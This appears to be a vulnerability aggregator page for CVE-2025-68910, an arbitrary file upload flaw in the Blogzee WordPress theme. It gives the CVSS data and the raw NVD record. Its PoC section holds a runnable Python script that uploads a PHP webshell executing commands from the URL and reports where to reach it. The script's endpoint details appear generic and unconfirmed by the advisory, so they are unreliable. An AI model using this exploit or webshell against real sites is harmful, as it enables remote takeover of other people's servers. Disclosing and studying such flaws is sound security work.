Security Vulnerability Report
中文
CVE-2025-68910 CVSS 9.9 CRITICAL

CVE-2025-68910

Published: 2026-01-22 17:16:15
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogzee blogzee allows Using Malicious Files.This issue affects Blogzee: from n/a through <= 1.0.5.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Blogzee Theme <= 1.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68910 Blogzee Theme Arbitrary File Upload PoC # Target: WordPress site with Blogzee theme <= 1.0.5 def exploit(target_url, webshell_content): """ Exploit arbitrary file upload vulnerability in Blogzee theme """ upload_url = f"{target_url}/wp-content/themes/blogzee/includes/upload.php" # Create malicious PHP file files = { 'file': ('shell.php', webshell_content, 'application/x-php') } data = { 'action': 'upload', 'type': 'image' } try: response = requests.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: # Extract uploaded file path from response upload_path = response.json().get('url', '') if upload_path: print(f"[+] File uploaded successfully: {upload_path}") print(f"[+] Access webshell at: {upload_path}") return upload_path print("[-] Upload failed") return None except Exception as e: print(f"[-] Error: {str(e)}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68910.py <target_url>") sys.exit(1) target = sys.argv[1] webshell = "<?php system($_GET['cmd']); ?>" exploit(target, webshell)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68910", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:14.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogzee blogzee allows Using Malicious Files.This issue affects Blogzee: from n/a through <= 1.0.5."}, {"lang": "es", "value": "Vulnerabilidad de carga de archivos de tipo peligroso sin restricciones en blazethemes Blogzee blogzee permite el uso de archivos maliciosos. Este problema afecta a Blogzee: desde n/a hasta &lt;= 1.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/blogzee/vulnerability/wordpress-blogzee-theme-1-0-5-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}